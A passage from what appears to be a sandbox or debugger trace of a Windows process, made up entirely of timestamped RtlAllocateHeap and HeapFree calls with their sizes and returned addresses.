Size=0x1247) returned 0x5fd8e0 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x520) returned 0x5c88b0 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1b56) returned 0x5c9380 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a0) returned 0x5fd8e0 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x28ed) returned 0x5caee0 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x550) returned 0x5c88b0 [0080.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2537) returned 0x5fd8e0 [0080.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x12b7) returned 0x5c9380 [0080.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x950) returned 0x5cd7e0 [0080.206] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.206] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3d4f) returned 0x5ce140 [0080.206] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caee0 | out: hHeap=0x5b0000) returned 1 [0080.206] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cd7e0 | out: hHeap=0x5b0000) returned 1 [0080.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2377) returned 0x5fd8e0 [0080.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x11d7) returned 0x5d1ea0 [0080.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8e0) returned 0x5c9380 [0080.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1ea0 | out: hHeap=0x5b0000) returned 1 [0080.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5b0) returned 0x5c88b0 [0080.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x640) returned 0x5c88b0 [0080.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5be2) returned 0x5ddae0 [0080.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce140 | out: hHeap=0x5b0000) returned 1 [0080.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x890) returned 0x5fd8e0 [0080.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xac0) returned 0x5fd8e0 [0080.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5bb290 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x960) returned 0x5fd8e0 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x960) returned 0x5fe250 [0080.209] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x460) returned 0x5c88b0 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xe0f) returned 0x5febc0 [0080.209] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fe250 | out: hHeap=0x5b0000) returned 1 [0080.209] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1c17) returned 0x5e36d0 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xe00) returned 0x5fd8e0 [0080.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x700) returned 0x5e52f0 [0080.210] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e36d0 | out: hHeap=0x5b0000) returned 1 [0080.210] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x153d) returned 0x5e36d0 [0080.210] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5febc0 | out: hHeap=0x5b0000) returned 1 [0080.210] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e52f0 | out: hHeap=0x5b0000) returned 1 [0080.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2277) returned 0x5fd8e0 [0080.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1157) returned 0x5e4c20 [0080.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a0) returned 0x5e5d80 [0080.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e4c20 | out: hHeap=0x5b0000) returned 1 [0080.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fc7) returned 0x5fd8e0 [0080.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e36d0 | out: hHeap=0x5b0000) returned 1 [0080.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e5d80 | out: hHeap=0x5b0000) returned 1 [0080.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1657) returned 0x5e36d0 [0080.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb20) returned 0x5e4d30 [0080.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x590) returned 0x5c88b0 [0080.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e36d0 | out: hHeap=0x5b0000) returned 1 [0080.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e4d30 | out: hHeap=0x5b0000) returned 1 [0080.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2f96) returned 0x5e36d0 [0080.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2b47) returned 0x5e6670 [0080.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x15b7) returned 0x5fd8e0 [0080.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad0) returned 0x5feea0 [0080.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e6670 | out: hHeap=0x5b0000) returned 1 [0080.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5feea0 | out: hHeap=0x5b0000) returned 1 [0080.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2697) returned 0x5fd8e0 [0080.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1367) returned 0x5e6670 [0080.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9a0) returned 0x5e79e0 [0080.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e6670 | out: hHeap=0x5b0000) returned 1 [0080.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x474d) returned 0x5e8390 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e36d0 | out: hHeap=0x5b0000) returned 1 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e79e0 | out: hHeap=0x5b0000) returned 1 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x920) returned 0x5ecaf0 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ecaf0 | out: hHeap=0x5b0000) returned 1 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1b47) returned 0x5fd8e0 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xd90) returned 0x5ecaf0 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6d0) returned 0x5ff430 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ecaf0 | out: hHeap=0x5b0000) returned 1 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ff430 | out: hHeap=0x5b0000) returned 1 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5d0) returned 0x5c88b0 [0080.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6adf) returned 0x5c9380 [0080.215] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e8390 | out: hHeap=0x5b0000) returned 1 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1887) returned 0x5fd8e0 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc30) returned 0x5ff170 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x620) returned 0x5c88b0 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ff170 | out: hHeap=0x5b0000) returned 1 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8f0) returned 0x5fd8e0 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x480) returned 0x5c88b0 [0080.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x240) returned 0x5fe1e0 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.217] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fe1e0 | out: hHeap=0x5b0000) returned 1 [0080.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5c08a0 [0080.217] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb290 | out: hHeap=0x5b0000) returned 1 [0080.217] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ddae0 | out: hHeap=0x5b0000) returned 1 [0080.217] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.218] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c08a0 | out: hHeap=0x5b0000) returned 1 [0080.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9900) returned 0x5c9380 [0080.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1bf0) returned 0x5fd8e0 [0080.220] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9937) returned 0x5ddae0 [0080.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5bb290 [0080.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9900) returned 0x5c9380 [0080.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1bf0) returned 0x5fd8e0 [0080.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0080.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9937) returned 0x5fd8e0 [0080.223] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9380 | out: hHeap=0x5b0000) returned 1 [0080.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5c0710 [0080.224] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb290 | out: hHeap=0x5b0000) returned 1 [0080.224] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3730 | out: hHeap=0x5b0000) returned 1 [0080.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ed9e0 | out: hHeap=0x5b0000) returned 1 [0080.225] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c0620 | out: hHeap=0x5b0000) returned 1 [0080.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x5c9380 [0080.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x5e7420 [0080.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8) returned 0x5b88b0 [0080.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x607220 [0080.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c90e0 [0080.236] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b88b0 | out: hHeap=0x5b0000) returned 1 [0080.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x61a430 [0080.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c9220 [0080.237] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c90e0 | out: hHeap=0x5b0000) returned 1 [0080.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x62d640 [0080.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5bb890 [0080.237] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9220 | out: hHeap=0x5b0000) returned 1 [0080.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x640850 [0080.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x30) returned 0x5c81b0 [0080.238] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb890 | out: hHeap=0x5b0000) returned 1 [0080.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x653a60 [0080.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x666c70 [0080.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x48) returned 0x5c0d00 [0080.239] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c81b0 | out: hHeap=0x5b0000) returned 1 [0080.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x679e80 [0080.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x68d090 [0080.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1ed0080 [0080.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5b88b0 [0080.240] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c0d00 | out: hHeap=0x5b0000) returned 1 [0080.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1ee3290 [0080.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1ef64a0 [0080.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f096b0 [0080.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f1c8c0 [0080.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x98) returned 0x5b4c20 [0080.241] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b88b0 | out: hHeap=0x5b0000) returned 1 [0080.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f2fad0 [0080.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f42ce0 [0080.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f55ef0 [0080.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f69100 [0080.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f7c310 [0080.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1f8f520 [0080.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xe0) returned 0x5b4850 [0080.243] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b4c20 | out: hHeap=0x5b0000) returned 1 [0080.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1fa2730 [0080.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1fd0080 [0080.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1fe3290 [0080.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x1ff64a0 [0080.245] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20096b0 [0080.245] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x201c8c0 [0080.245] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x202fad0 [0080.246] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2042ce0 [0080.246] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2055ef0 [0080.247] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x150) returned 0x5bb050 [0080.247] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b4850 | out: hHeap=0x5b0000) returned 1 [0080.247] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2069100 [0080.247] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x207c310 [0080.247] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x208f520 [0080.248] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20a2730 [0080.248] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20b5940 [0080.249] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20c8b50 [0080.249] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20dbd60 [0080.249] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x20eef70 [0080.328] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2102180 [0080.329] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2115390 [0080.329] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x21285a0 [0080.329] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x213b7b0 [0080.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x214e9c0 [0080.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2161bd0 [0080.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1f8) returned 0x5c88b0 [0080.330] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb050 | out: hHeap=0x5b0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2174de0 [0080.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2187ff0 [0080.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x219b200 [0080.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x21ae410 [0080.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x21d0080 [0080.332] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x21e3290 [0080.332] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x21f64a0 [0080.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22096b0 [0080.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x221c8c0 [0080.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x222fad0 [0080.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2242ce0 [0080.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2255ef0 [0080.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2269100 [0080.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x227c310 [0080.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x228f520 [0080.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22a2730 [0080.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22b5940 [0080.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22c8b50 [0080.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22dbd60 [0080.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x22eef70 [0080.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2302180 [0080.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x2f0) returned 0x5c8ab0 [0080.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c88b0 | out: hHeap=0x5b0000) returned 1 [0080.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2315390 [0080.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23285a0 [0080.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x233b7b0 [0080.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x234e9c0 [0080.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2361bd0 [0080.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2374de0 [0080.339] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2387ff0 [0080.339] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x239b200 [0080.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23ae410 [0080.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23c1620 [0080.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23d4830 [0080.341] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23e7a40 [0080.341] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x23fac50 [0080.342] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x240de60 [0080.342] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2421070 [0080.343] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2434280 [0080.343] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2447490 [0080.343] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x245a6a0 [0080.344] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x246d8b0 [0080.344] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2480ac0 [0080.344] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2493cd0 [0080.345] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x24a6ee0 [0080.345] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x24ba0f0 [0080.345] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x24cd300 [0080.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x24e0510 [0080.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x24f3720 [0080.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2506930 [0080.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x2519b40 [0080.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x252cd50 [0080.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x253ff60 